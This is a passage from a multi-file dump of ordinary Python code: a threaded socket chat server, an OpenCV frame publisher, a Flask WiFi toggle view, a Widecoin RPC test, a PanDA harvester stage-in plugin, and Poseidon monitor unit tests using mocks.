server.bind((IP_address, Port))
"""
listens for 5 active connections. This number can be
increased as per convenience.
"""
server.listen(5)
# Parallel lists: list_of_clients[i] is the socket served by
# list_of_threads[i]; remove() pops from both at the same index.
list_of_clients = []
list_of_threads = []
def clientthread(conn, addr):
    """Serve one chat client until it disconnects or errors.

    conn: connected socket object for this client.
    addr: (ip, port) tuple of the client, used to prefix its messages.
    """
    # sends a message to the client whose user object is conn
    conn.send("Welcome to this chatroom!".encode('utf-8'))
    while True:
        try:
            message = conn.recv(2048)
            if message:
                # Prefix the message with the sender's address and fan it
                # out to every other connected client.
                message_to_send = "<" + addr[0] + ":" + str(addr[1]) + "> " + message.decode()
                broadcast(message_to_send, conn)
                print(message_to_send)
            else:
                # BUG FIX: recv() returning b'' means the peer closed the
                # connection. The original did "continue" here, which
                # busy-spun forever on a dead socket; clean up and exit.
                remove(conn)
                print('clientthread down')
                break
        except Exception as e:
            print(e)
            remove(conn)
            print('clientthread down')
            break
"""Using the below function, we broadcast the message to all
clients who's object is not the same as the one sending
the message """
def broadcast(message, connection):
    """Send *message* (a str) to every connected client except *connection*.

    Clients whose send fails are closed and removed from the room.
    """
    # Iterate over a snapshot: remove() mutates list_of_clients, and
    # mutating a list while iterating it skips elements.
    for clients in list(list_of_clients):
        if clients != connection:
            try:
                # BUG FIX: sockets require bytes. The original called
                # message.decode() on a str, which raises AttributeError on
                # Python 3 and silently dropped every broadcast.
                clients.send(message.encode('utf-8'))
            except Exception:
                clients.close()
                # if the link is broken, we remove the client
                remove(clients)
"""The following function simply removes the object
from the list that was created at the beginning of
the program"""
def remove(connection):
    """Drop *connection* (and its paired thread entry) from the bookkeeping lists.

    The original popped from list_of_clients while iterating it with
    enumerate(), which is unsafe (elements shift under the iterator);
    look the index up once instead.
    """
    if connection in list_of_clients:
        index = list_of_clients.index(connection)
        list_of_clients.pop(index)
        # Keep the parallel thread list in step; guard against the lists
        # having drifted out of sync.
        if index < len(list_of_threads):
            list_of_threads.pop(index)
try:
    print('started server, port is {0}'.format(Port))
    while True:
        # NOTE(review): this sleep throttles accept() to at most one new
        # connection per second — presumably intentional; confirm.
        time.sleep(1)
        """Accepts a connection request and stores two parameters,
        conn which is a socket object for that user, and addr
        which contains the IP address of the client that just
        connected"""
        conn, addr = server.accept()
        """Maintains a list of clients for ease of broadcasting
        a message to all available people in the chatroom"""
        list_of_clients.append(conn)
        # prints the address of the user that just connected
        print(addr[0] + " connected")
        # creates an individual thread for every user
        # that connects
        list_of_threads.append(threading.Thread(target=clientthread, args=(conn,addr,)))
        list_of_threads[len(list_of_threads) - 1].start()
        print('runing threads : {0}'.format(len(list_of_threads)))
except Exception as e:
    # Any error in the accept loop (including Ctrl-C variants caught as
    # Exception subclasses) tears the whole server down.
    print(e)
    try:
        conn.close()
    except:
        print('conn error')
    try:
        server.close()
    except:
        print('server error')
    pass
main.py | import argparse
from multiprocessing import Process
import cv2
from publisher import Publisher
from subscriber import Subscriber
def publisher():
    """Capture frames from the default camera, publish each one, and show a
    local preview window until Esc is pressed or the window is closed."""
    pub = Publisher()
    cam = cv2.VideoCapture(0)
    while cam.isOpened():
        ok, frame = cam.read()
        if not ok:
            break
        pub.send(frame)
        cv2.imshow("Publisher", frame)
        if cv2.waitKey(20) == 27:  # Esc
            break
        # Stop when the user closes the preview window.
        if cv2.getWindowProperty("Publisher", cv2.WND_PROP_VISIBLE) < 1:
            break
    pub.close()
def subscriber(name: str):
    """Receive published frames and display them in a window titled *name*
    until Esc is pressed or the window is closed."""
    sub = Subscriber()
    while True:
        _, frame = sub.recv()
        cv2.imshow(name, frame)
        if cv2.waitKey(20) == 27:  # Esc
            break
        # Stop when the user closes the display window.
        if cv2.getWindowProperty(name, cv2.WND_PROP_VISIBLE) < 1:
            break
    sub.close()
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    # BUG FIX: argparse's type=bool converts ANY non-empty string to True
    # ("-s False" was truthy), so the flags could never be switched off on
    # the command line. store_true gives real boolean flags: present ->
    # True, absent -> False (same default as before).
    parser.add_argument("-s", action="store_true",
                        help="run the publisher process")
    parser.add_argument("-c", action="store_true",
                        help="run the subscriber process")
    parser.add_argument("-n", type=int, default=0,
                        help="index used in the subscriber window title")
    args = parser.parse_args()
    if args.s:
        Process(target=publisher).start()
    if args.c:
        Process(target=subscriber, args=(f'Subscriber {args.n}',)).start()
|
views.py | from flask import Blueprint, render_template, request, url_for
from connectboxcontrol.util.control import control
import os
import json
import threading
# Blueprint for the landing page; static assets are served under
# /main/static so they do not collide with other blueprints' files.
main_blueprint = Blueprint('main', __name__, static_folder='static',
                           static_url_path='/main/static',
                           template_folder='templates')
@main_blueprint.route('/', methods=['GET'])
def main_get():
    """Render the main page containing the WiFi on/off button."""
    return render_template('main.html')
@main_blueprint.route('/', methods=['POST'])
def main_post():
    """Turn the WiFi on/off.

    Reads the router password from config.json and kicks off the control
    command on a worker thread so the HTTP response is not blocked.
    """
    if os.path.isfile('config.json'):
        with open('config.json', 'r') as f:
            config = json.load(f)
            password = config['password']
        if 'on' in request.form:
            # control(password, 1) turns the WiFi on in the background.
            threading.Thread(target=control, args=(password, 1)).start()
            return render_template(
                'message.html',
                title="Success",
                message="WiFi is being turned on."
            )
        elif 'off' in request.form:
            threading.Thread(target=control, args=(password, 0)).start()
            return render_template(
                'message.html',
                title="Success",
                message="WiFi is being turned off."
            )
        # NOTE(review): a POST containing neither 'on' nor 'off' falls
        # through here and returns None, which Flask reports as an error —
        # confirm this is intended.
    else:
        # No saved config: direct the user to the configuration page.
        url = url_for('config.config_get', _external=True)
        return render_template(
            'message.html',
            title="Error",
            message=("The router password is unknown.<br/>Set it up "
                     "<a href='" + url + "'>here</a>.")
        )
|
TCP2Server.py | import socket
import threading
import CompressAndDecompress
from CompressAndDecompress import Compressed
class TCPserver():
    """Minimal threaded TCP server that decompresses incoming payloads and
    echoes the raw request back to the client."""

    def __init__(self):
        # Fixed listen address; adjust here if the client moves.
        self.server_ip = 'localhost'
        self.server_port = 9999

    def main(self):
        """Bind, listen, and hand each accepted connection to a thread."""
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.bind((self.server_ip, self.server_port))
        listener.listen(1)
        print(f'[*] Listening on {self.server_ip}:{self.server_port}')
        while True:
            client, address = listener.accept()
            print(f'[*] Accepted connection from {address[0]}:{address[1]}')
            worker = threading.Thread(target=self.handle_client, args=(client,))
            worker.start()

    def handle_client(self, client_socket):
        """Receive one compressed payload, decompress it via the project's
        Compressed helper, and echo the original request bytes back."""
        with client_socket as sock:
            request = sock.recv(1024)
            print(f'[*] Received: {request.decode("utf-8")}')
            # Changing to integer to decompress
            received_value: int = int(request.decode("utf-8"))
            print("Type of Received:>", type(received_value))
            # Compressed comes from the project-local CompressAndDecompress
            # module; 'test' matches the original placeholder argument.
            codec = Compressed('test', received_value)
            decompressed: str = codec.decompress()
            print("Decompressed Data From client:>", decompressed)
            # Echo the raw request bytes back as the acknowledgement.
            sock.send(bytes(request))
# Start the server only when executed directly, not on import.
if __name__ == '__main__':
    Myserver = TCPserver()
    Myserver.main()
interface_rpc.py | #!/usr/bin/env python3
# Copyright (c) 2018-2020 The Widecoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Tests some generic aspects of the RPC interface."""
import os
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import WidecoinTestFramework
from test_framework.util import assert_equal, assert_greater_than_or_equal
from threading import Thread
import subprocess
def expect_http_status(expected_http_status, expected_rpc_code,
                       fcn, *args):
    """Call fcn(*args) and require that it fails with the given JSON-RPC
    error code and HTTP status; fail the test if it does not raise."""
    try:
        fcn(*args)
    except JSONRPCException as exc:
        assert_equal(exc.error["code"], expected_rpc_code)
        assert_equal(exc.http_status, expected_http_status)
    else:
        raise AssertionError("Expected RPC error %d, got none" % expected_rpc_code)
def test_work_queue_getblock(node, got_exceeded_error):
    """Hammer the node with getrpcinfo CLI calls until the work queue
    overflows; got_exceeded_error is a shared list used as a cross-thread
    "seen it" flag, so all workers stop once any of them hits the limit."""
    while not got_exceeded_error:
        try:
            node.cli('getrpcinfo').send_cli()
        except subprocess.CalledProcessError as e:
            assert_equal(e.output, 'error: Server response: Work queue depth exceeded\n')
            got_exceeded_error.append(True)
class RPCInterfaceTest(WidecoinTestFramework):
    """Functional test covering generic aspects of the JSON-RPC interface."""

    def set_test_params(self):
        self.num_nodes = 1
        self.setup_clean_chain = True
        self.supports_cli = False

    def test_getrpcinfo(self):
        self.log.info("Testing getrpcinfo...")
        info = self.nodes[0].getrpcinfo()
        # The getrpcinfo call itself is the only RPC in flight.
        assert_equal(len(info['active_commands']), 1)
        command = info['active_commands'][0]
        assert_equal(command['method'], 'getrpcinfo')
        assert_greater_than_or_equal(command['duration'], 0)
        assert_equal(info['logpath'], os.path.join(self.nodes[0].datadir, self.chain, 'debug.log'))

    def test_batch_request(self):
        self.log.info("Testing basic JSON-RPC batch request...")
        results = self.nodes[0].batch([
            # A basic request that will work fine.
            {"method": "getblockcount", "id": 1},
            # Request that will fail. The whole batch request should still
            # work fine.
            {"method": "invalidmethod", "id": 2},
            # Another call that should succeed.
            {"method": "getblockhash", "id": 3, "params": [0]},
        ])
        result_by_id = {}
        for res in results:
            result_by_id[res["id"]] = res
        assert_equal(result_by_id[1]['error'], None)
        assert_equal(result_by_id[1]['result'], 0)
        # -32601 is the JSON-RPC "method not found" error code.
        assert_equal(result_by_id[2]['error']['code'], -32601)
        assert_equal(result_by_id[2]['result'], None)
        assert_equal(result_by_id[3]['error'], None)
        assert result_by_id[3]['result'] is not None

    def test_http_status_codes(self):
        self.log.info("Testing HTTP status codes for JSON-RPC requests...")
        expect_http_status(404, -32601, self.nodes[0].invalidmethod)
        expect_http_status(500, -8, self.nodes[0].getblockhash, 42)

    def test_work_queue_exceeded(self):
        self.log.info("Testing work queue exceeded...")
        # Depth 1 with a single RPC thread makes the limit trivial to hit
        # from three concurrent CLI clients.
        self.restart_node(0, ['-rpcworkqueue=1', '-rpcthreads=1'])
        got_exceeded_error = []
        threads = []
        for _ in range(3):
            t = Thread(target=test_work_queue_getblock, args=(self.nodes[0], got_exceeded_error))
            t.start()
            threads.append(t)
        for t in threads:
            t.join()

    def run_test(self):
        self.test_getrpcinfo()
        self.test_batch_request()
        self.test_http_status_codes()
        self.test_work_queue_exceeded()
# Standard test-framework entry point.
if __name__ == '__main__':
    RPCInterfaceTest().main()
|
pilotmover_mt_preparator.py | import os.path
import os
import threading
import time
from future.utils import iteritems
from pandaharvester.harvestercore import core_utils
from pandaharvester.harvestercore.plugin_base import PluginBase
from pandaharvester.harvestermover import mover_utils
from pilot.api import data
# logger
baseLogger = core_utils.setup_logger('pilotmover_mt_preparator')
# plugin for preparator based on Pilot2.0 Data API, MultipleThreads
# Pilot 2.0 should be deployed as library
# default self.basePath came from preparator section of configuration file
class PilotmoverMTPreparator(PluginBase):
    """
    Preparator that brings files from remote ATLAS/Rucio storage to the local
    facility via the Pilot 2.0 Data API, spreading the transfers over several
    worker threads.
    """

    # constructor
    def __init__(self, **kwarg):
        # Number of stage-in worker threads; the harvester configuration
        # (applied by PluginBase.__init__) may override this default.
        self.n_threads = 3
        PluginBase.__init__(self, **kwarg)
        if self.n_threads < 1:
            self.n_threads = 1

    # check status
    def check_status(self, jobspec):
        # Transfers run synchronously inside trigger_preparation, so there
        # is nothing left to poll here.
        return True, ''

    def stage_in(self, tmpLog, jobspec, files):
        """Stage in one batch of files with the Pilot StageInClient.

        Returns (ok, error_message): ok is False if any transfer in the
        batch reported a non-zero errno.
        """
        tmpLog.debug('To stagein files[] {0}'.format(files))
        data_client = data.StageInClient(site=jobspec.computingSite)
        allChecked = True
        ErrMsg = 'These files failed to download : '
        if len(files) > 0:
            result = data_client.transfer(files)
            tmpLog.debug('pilot.api data.StageInClient.transfer(files) result: {0}'.format(result))
            # loop over each file check result all must be true for entire result to be true
            if result:
                for answer in result:
                    if answer['errno'] != 0:
                        allChecked = False
                        ErrMsg = ErrMsg + (" %s " % answer['name'])
        else:
            tmpLog.info('Looks like all files already inplace: {0}'.format(files))
        # return
        tmpLog.debug('stop thread')
        if allChecked:
            return True, ''
        else:
            return False, ErrMsg

    # trigger preparation
    def trigger_preparation(self, jobspec):
        """Collect the job's missing input files and stage them in with a
        pool of threads; returns (ok, error_message)."""
        # make logger
        tmpLog = self.make_logger(baseLogger, 'PandaID={0}'.format(jobspec.PandaID),
                                  method_name='trigger_preparation')
        tmpLog.debug('start')
        # check that jobspec.computingSite is defined
        if jobspec.computingSite is None:
            # not found
            tmpLog.error('jobspec.computingSite is not defined')
            return False, 'jobspec.computingSite is not defined'
        else:
            tmpLog.debug('jobspec.computingSite : {0}'.format(jobspec.computingSite))
        # get input files
        files = []
        inFiles = jobspec.get_input_file_attributes(skip_ready=True)
        # set path to each file
        for inLFN, inFile in iteritems(inFiles):
            inFile['path'] = mover_utils.construct_file_path(self.basePath, inFile['scope'], inLFN)
            tmpLog.debug('To check file: %s' % inFile)
            if os.path.exists(inFile['path']):
                # Skip files already in place with a matching adler32 checksum.
                checksum = core_utils.calc_adler32(inFile['path'])
                checksum = 'ad:%s' % checksum
                tmpLog.debug('checksum for file %s is %s' % (inFile['path'], checksum))
                if 'checksum' in inFile and inFile['checksum'] and inFile['checksum'] == checksum:
                    tmpLog.debug('File %s already exists at %s' % (inLFN, inFile['path']))
                    continue
            dstpath = os.path.dirname(inFile['path'])
            # check if path exists if not create it.
            if not os.access(dstpath, os.F_OK):
                os.makedirs(dstpath)
            files.append({'scope': inFile['scope'],
                          'name': inLFN,
                          'destination': dstpath})
        tmpLog.debug('files[] {0}'.format(files))
        allChecked = True
        ErrMsg = 'These files failed to download : '
        if files:
            threads = []
            # BUG FIX: ceiling division must use '//' — on Python 3 plain
            # '/' yields a float, which range() rejects with a TypeError.
            n_files_per_thread = (len(files) + self.n_threads - 1) // self.n_threads
            tmpLog.debug('num files per thread: %s' % n_files_per_thread)
            for i in range(0, len(files), n_files_per_thread):
                sub_files = files[i:i + n_files_per_thread]
                thread = threading.Thread(target=self.stage_in,
                                          kwargs={'tmpLog': tmpLog,
                                                  'jobspec': jobspec,
                                                  'files': sub_files})
                threads.append(thread)
            [t.start() for t in threads]
            # Poll once a second until every worker thread has finished.
            while len(threads) > 0:
                time.sleep(1)
                # BUG FIX: Thread.isAlive() was removed in Python 3.9;
                # is_alive() has existed since Python 2.6.
                threads = [t for t in threads if t and t.is_alive()]
        tmpLog.info('Checking all files: {0}'.format(files))
        for file in files:
            # NOTE(review): 'errno' is not set on the dicts built above;
            # presumably data_client.transfer() annotates each dict in
            # place. .get() avoids a KeyError when it does not — confirm
            # against the Pilot Data API.
            if file.get('errno', 0) != 0:
                allChecked = False
                ErrMsg = ErrMsg + (" %s " % file['name'])
        # return
        tmpLog.debug('stop')
        if allChecked:
            tmpLog.info('Looks like all files are successfully downloaded.')
            return True, ''
        else:
            return False, ErrMsg

    # resolve input file paths
    def resolve_input_paths(self, jobspec):
        """Record the local path of every input file on the job spec."""
        # get input files
        inFiles = jobspec.get_input_file_attributes()
        # set path to each file
        for inLFN, inFile in iteritems(inFiles):
            inFile['path'] = mover_utils.construct_file_path(self.basePath, inFile['scope'], inLFN)
        # set
        jobspec.set_input_file_paths(inFiles)
        return True, ''
|
test_poseidonMonitor.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016-2017 In-Q-Tel, Inc, All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Test module for poseidonMonitor.py
Created on 28 June 2016
@author: cglewis, dgrossman, MShel
"""
import json
from prometheus_client import Gauge
from poseidon.baseClasses.Logger_Base import Logger
from poseidon.poseidonMonitor import poseidonMonitor
from poseidon.poseidonMonitor.endPoint import EndPoint
from poseidon.poseidonMonitor.NorthBoundControllerAbstraction.EndpointWrapper import Endpoint_Wrapper
from poseidon.poseidonMonitor.poseidonMonitor import Collector
from poseidon.poseidonMonitor.poseidonMonitor import CTRL_C
from poseidon.poseidonMonitor.poseidonMonitor import Monitor
from poseidon.poseidonMonitor.poseidonMonitor import schedule_job_kickurl
from poseidon.poseidonMonitor.poseidonMonitor import schedule_thread_worker
def test_signal_handler():
    """signal_handler must cancel every scheduled job and close the rabbit
    connection regardless of the signal arguments it receives."""
    class MockLogger:
        def __init__(self):
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger

    class MockRabbitConnection:
        connection_closed = False

        def close(self):
            self.connection_closed = True
            return True

    class MockScheduele:
        call_log = []

        def __init__(self):
            self.jobs = ['job1', 'job2', 'job3']

        def cancel_job(self, job):
            self.call_log.append(job + ' cancelled')
            return job + ' cancelled'

    class MockMonitor(Monitor):
        def __init__(self):
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger

    monitor = MockMonitor()
    monitor.schedule = MockScheduele()
    monitor.rabbit_channel_connection_local = MockRabbitConnection()
    monitor.logger = MockLogger().logger
    # signal handler seem to simply exit and kill all the jobs no matter what
    # we pass
    monitor.signal_handler(None, None)
    expected = ['job1 cancelled', 'job2 cancelled', 'job3 cancelled']
    assert expected == monitor.schedule.call_log
    assert monitor.rabbit_channel_connection_local.connection_closed is True
def test_start_vent_collector_faucet():
    """start_vent_collector should post a capture request when the Faucet
    SDN controller reports a healthy connection."""
    class MockLogger:
        def __init__(self):
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger

    class MockRequests():
        def __init__(self):
            pass

        def post(uri, json, data):
            def mock_response():
                return None
            mock_response.text = 'success'
            # exercise the stub so both attributes are covered
            assert mock_response() is None
            assert mock_response.text == 'success'
            return mock_response

    class FaucetProxy():
        def __init__(self):
            pass

        def check_connection(self):
            return True

    poseidonMonitor.CTRL_C['STOP'] = False
    poseidonMonitor.requests = MockRequests()

    class Mock_Update_Switch_State():
        def __init__(self):
            prod = {'ip-address': '10.0.0.101', 'mac': 'f8:b1:56:fe:f2:de',
                    'segment': 'prod', 'tenant': 'FOO', 'name': None}
            ext = {'ip-address': '10.0.0.99', 'mac': '20:4c:9e:5f:e3:c3',
                   'segment': 'to-core-router', 'tenant': 'EXTERNAL', 'name': None}
            # (hash, info, state, next_state); prev_state is always 'NONE'.
            specs = [
                ('4ee39d254db3e4a5264b75ce8ae312d69f9e73a3', prod, 'UNKNOWN', 'NONE'),
                ('4ee39d254db3e4a5264b75ce8ae312d69f9e73a4', prod, 'UNKNOWN', 'MIRRORING'),
                ('4ee39d254db3e4a5264b75ce8ae312d69f9e73a5', prod, 'UNKNOWN', 'KNOWN'),
                ('4ee39d254db3e4a5264b75ce8ae312d69f9e73a6', prod, 'MIRRORING', 'KNOWN'),
                ('4ee39d254db3e4a5264b75ce8ae312d69f9e73a7', prod, 'KNOWN', 'REINVESTIGATING'),
                ('4ee39d254db3e4a5264b75ce8ae312d69f9e73a8', prod, 'UNKNOWN', 'SHUTDOWN'),
                ('d60c5fa5c980b1cd791208eaf62aba9fb46d3aaa', ext, 'MIRRORING', 'NONE'),
                ('d60c5fa5c980b1cd791208eaf62aba9fb46d3aa1', ext, 'MIRRORING', 'NONE'),
                ('d60c5fa5c980b1cd791208eaf62aba9fb46d3aa2', ext, 'REINVESTIGATING', 'NONE'),
                ('d60c5fa5c980b1cd791208eaf62aba9fb46d3aa3', ext, 'REINVESTIGATING', 'NONE'),
            ]
            self.endpoints = Endpoint_Wrapper()
            for ep_hash, info, state, next_state in specs:
                self.endpoints.state[ep_hash] = EndPoint(
                    dict(info), prev_state='NONE', state=state, next_state=next_state)
            self.logger = None
            self.sdnc = FaucetProxy()

        def return_endpoint_state(self):
            return self.endpoints

    class MockMonitor(Monitor):
        def __init__(self):
            self.mod_configuration = dict({
                'reinvestigation_frequency': 900,
                'collector_nic': 2,
                'vent_ip': '0.0.0.0',
                'vent_port': '8080',
            })
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger
            self.uss = Mock_Update_Switch_State()

    mock_monitor = MockMonitor()
    mock_monitor.logger = MockLogger().logger
    dev_hash = 'test'
    num_captures = 3
    mock_monitor.start_vent_collector(dev_hash, num_captures)
def test_start_vent_collector_bcf():
    """start_vent_collector should post a capture request when the BCF SDN
    controller reports a healthy connection."""
    class MockLogger:
        def __init__(self):
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger

    class MockRequests():
        def __init__(self):
            pass

        def post(uri, json, data):
            def mock_response():
                return None
            mock_response.text = 'success'
            # exercise the stub so both attributes are covered
            assert mock_response() is None
            assert mock_response.text == 'success'
            return mock_response

    class BCFProxy():
        def __init__(self):
            pass

        def check_connection(self):
            return True

    poseidonMonitor.CTRL_C['STOP'] = False
    poseidonMonitor.requests = MockRequests()

    class Mock_Update_Switch_State():
        def __init__(self):
            prod = {'ip-address': '10.0.0.101', 'mac': 'f8:b1:56:fe:f2:de',
                    'segment': 'prod', 'tenant': 'FOO', 'name': None}
            ext = {'ip-address': '10.0.0.99', 'mac': '20:4c:9e:5f:e3:c3',
                   'segment': 'to-core-router', 'tenant': 'EXTERNAL', 'name': None}
            # (hash, info, state, next_state); prev_state is always 'NONE'.
            specs = [
                ('4ee39d254db3e4a5264b75ce8ae312d69f9e73a3', prod, 'UNKNOWN', 'NONE'),
                ('4ee39d254db3e4a5264b75ce8ae312d69f9e73a4', prod, 'UNKNOWN', 'MIRRORING'),
                ('4ee39d254db3e4a5264b75ce8ae312d69f9e73a5', prod, 'UNKNOWN', 'KNOWN'),
                ('4ee39d254db3e4a5264b75ce8ae312d69f9e73a6', prod, 'MIRRORING', 'KNOWN'),
                ('4ee39d254db3e4a5264b75ce8ae312d69f9e73a7', prod, 'KNOWN', 'REINVESTIGATING'),
                ('4ee39d254db3e4a5264b75ce8ae312d69f9e73a8', prod, 'UNKNOWN', 'SHUTDOWN'),
                ('d60c5fa5c980b1cd791208eaf62aba9fb46d3aaa', ext, 'MIRRORING', 'NONE'),
                ('d60c5fa5c980b1cd791208eaf62aba9fb46d3aa1', ext, 'MIRRORING', 'NONE'),
                ('d60c5fa5c980b1cd791208eaf62aba9fb46d3aa2', ext, 'REINVESTIGATING', 'NONE'),
                ('d60c5fa5c980b1cd791208eaf62aba9fb46d3aa3', ext, 'REINVESTIGATING', 'NONE'),
            ]
            self.endpoints = Endpoint_Wrapper()
            for ep_hash, info, state, next_state in specs:
                self.endpoints.state[ep_hash] = EndPoint(
                    dict(info), prev_state='NONE', state=state, next_state=next_state)
            self.logger = None
            self.sdnc = BCFProxy()

        def return_endpoint_state(self):
            return self.endpoints

    class MockMonitor(Monitor):
        def __init__(self):
            self.mod_configuration = dict({
                'reinvestigation_frequency': 900,
                'collector_nic': 2,
                'vent_ip': '0.0.0.0',
                'vent_port': '8080',
            })
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger
            self.uss = Mock_Update_Switch_State()

    mock_monitor = MockMonitor()
    mock_monitor.logger = MockLogger().logger
    dev_hash = 'test'
    num_captures = 3
    mock_monitor.start_vent_collector(dev_hash, num_captures)
def test_not_start_vent_collector_bcf():
    """start_vent_collector should cope with a BCF SDN controller whose
    connection check fails."""
    class MockLogger:
        def __init__(self):
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger

    class MockRequests():
        def __init__(self):
            pass

        def post(uri, json, data):
            def mock_response():
                return None
            mock_response.text = 'success'
            # exercise the stub so both attributes are covered
            assert mock_response() is None
            assert mock_response.text == 'success'
            return mock_response

    class BCFProxy():
        def __init__(self):
            pass

        def check_connection(self):
            # Unlike the happy-path test, the controller is unreachable.
            return False

    poseidonMonitor.CTRL_C['STOP'] = False
    poseidonMonitor.requests = MockRequests()

    class Mock_Update_Switch_State():
        def __init__(self):
            prod = {'ip-address': '10.0.0.101', 'mac': 'f8:b1:56:fe:f2:de',
                    'segment': 'prod', 'tenant': 'FOO', 'name': None}
            ext = {'ip-address': '10.0.0.99', 'mac': '20:4c:9e:5f:e3:c3',
                   'segment': 'to-core-router', 'tenant': 'EXTERNAL', 'name': None}
            # (hash, info, state, next_state); prev_state is always 'NONE'.
            specs = [
                ('4ee39d254db3e4a5264b75ce8ae312d69f9e73a3', prod, 'UNKNOWN', 'NONE'),
                ('4ee39d254db3e4a5264b75ce8ae312d69f9e73a4', prod, 'UNKNOWN', 'MIRRORING'),
                ('4ee39d254db3e4a5264b75ce8ae312d69f9e73a5', prod, 'UNKNOWN', 'KNOWN'),
                ('4ee39d254db3e4a5264b75ce8ae312d69f9e73a6', prod, 'MIRRORING', 'KNOWN'),
                ('4ee39d254db3e4a5264b75ce8ae312d69f9e73a7', prod, 'KNOWN', 'REINVESTIGATING'),
                ('4ee39d254db3e4a5264b75ce8ae312d69f9e73a8', prod, 'UNKNOWN', 'SHUTDOWN'),
                ('d60c5fa5c980b1cd791208eaf62aba9fb46d3aaa', ext, 'MIRRORING', 'NONE'),
                ('d60c5fa5c980b1cd791208eaf62aba9fb46d3aa1', ext, 'MIRRORING', 'NONE'),
                ('d60c5fa5c980b1cd791208eaf62aba9fb46d3aa2', ext, 'REINVESTIGATING', 'NONE'),
                ('d60c5fa5c980b1cd791208eaf62aba9fb46d3aa3', ext, 'REINVESTIGATING', 'NONE'),
            ]
            self.endpoints = Endpoint_Wrapper()
            for ep_hash, info, state, next_state in specs:
                self.endpoints.state[ep_hash] = EndPoint(
                    dict(info), prev_state='NONE', state=state, next_state=next_state)
            self.logger = None
            self.sdnc = BCFProxy()

        def return_endpoint_state(self):
            return self.endpoints

    class MockMonitor(Monitor):
        def __init__(self):
            self.mod_configuration = dict({
                'reinvestigation_frequency': 900,
                'collector_nic': 2,
                'vent_ip': '0.0.0.0',
                'vent_port': '8080',
            })
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger
            self.uss = Mock_Update_Switch_State()

    mock_monitor = MockMonitor()
    mock_monitor.logger = MockLogger().logger
    dev_hash = 'test'
    num_captures = 3
    mock_monitor.start_vent_collector(dev_hash, num_captures)
def test_get_vent_collectors():
    """get_vent_collectors() should return a dict of collectors parsed from
    the (mocked) vent HTTP response."""
    class MockLogger:
        def __init__(self):
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger

    class MockRequests():
        # Stand-in for the real `requests` module; monkey-patched onto
        # poseidonMonitor below so no network traffic happens.
        def __init__(self):
            pass

        def get(self, uri):
            def mock_response():
                def mock_json():
                    # Parsed form of the payload the vent endpoint would
                    # serve (identical to json.loads of the original text).
                    return {'dataset': [
                        {'ip': '10.176.143.99', 'mac': '20:4c:9e:5f:e3:c4',
                         'segment': 'to-core-router', 'port': None,
                         'tenant': 'EXTERNAL', 'record_source': 'Poseidon',
                         'role': 'Unknown', 'os': 'Unknown', 'behavior': 0,
                         'hash': '6b961fd660269dd1384605bd439ffb197fd53f0f',
                         'state': 'KNOWN', 'active': 1},
                        {'ip': '10.177.0.253', 'mac': '52:54:00:66:df:67',
                         'segment': 'prod', 'port': None,
                         'tenant': 'ESX', 'record_source': 'Poseidon',
                         'role': 'Unknown', 'os': 'Unknown', 'behavior': 0,
                         'hash': 'b8d31352453a65036b4343f34c2a93f5d5442b70',
                         'state': 'KNOWN', 'active': 0},
                        {'ip': '10.176.143.1', 'mac': '18:66:da:7f:35:60',
                         'segment': 'to-core-router', 'port': None,
                         'tenant': 'EXTERNAL', 'record_source': 'Poseidon',
                         'role': 'Unknown', 'os': 'Unknown', 'behavior': 1,
                         'hash': 'bc3e82c8672ab19e5c3959d8135b873297209ff4',
                         'state': 'KNOWN', 'active': 1}]}
                mock_response.json = mock_json
                return None
            mock_response.text = (
                "(True, [{'status': u'exited', 'args': [u'enp3s0', u'900', "
                "u'd525bec2b05a12af95021337eaa0b20e02b70f3a', u'1', "
                "u'host 192.168.0.30'], 'id': u'0bce1351109e'}, "
                "{'status': u'exited', 'args': [u'enp3s0', u'900', "
                "u'97b7edfa648a994467ff0d2f87858a5ea22adaaa', u'1', "
                "u'host 192.168.0.20'], 'id': u'c1a662efea1c'}, "
                "{'status': u'exited', 'args': [u'enp3s0', u'900', "
                "u'5a348c8a714c1092c7401decc74dbca5f5749195', u'1', "
                "u'host 192.168.0.50'], 'id': u'2602280bb9da'}])")
            # cover the mock object itself
            a = mock_response()
            b = mock_response.json()
            assert a is None
            assert isinstance(b, dict)
            return mock_response

    poseidonMonitor.CTRL_C['STOP'] = False
    poseidonMonitor.requests = MockRequests()

    def _endpoint(ip, mac, segment, tenant, state, next_state):
        # One EndPoint record; every entry shares prev_state='NONE'.
        return EndPoint(
            {'ip-address': ip, 'mac': mac, 'segment': segment,
             'tenant': tenant, 'name': None},
            prev_state='NONE', state=state, next_state=next_state)

    class Mock_Update_Switch_State():
        def __init__(self):
            prod_host = ('10.0.0.101', 'f8:b1:56:fe:f2:de', 'prod', 'FOO')
            core_host = ('10.0.0.99', '20:4c:9e:5f:e3:c3',
                         'to-core-router', 'EXTERNAL')
            transitions = {
                '4ee39d254db3e4a5264b75ce8ae312d69f9e73a3':
                    prod_host + ('UNKNOWN', 'NONE'),
                '4ee39d254db3e4a5264b75ce8ae312d69f9e73a4':
                    prod_host + ('UNKNOWN', 'MIRRORING'),
                '4ee39d254db3e4a5264b75ce8ae312d69f9e73a5':
                    prod_host + ('UNKNOWN', 'KNOWN'),
                '4ee39d254db3e4a5264b75ce8ae312d69f9e73a6':
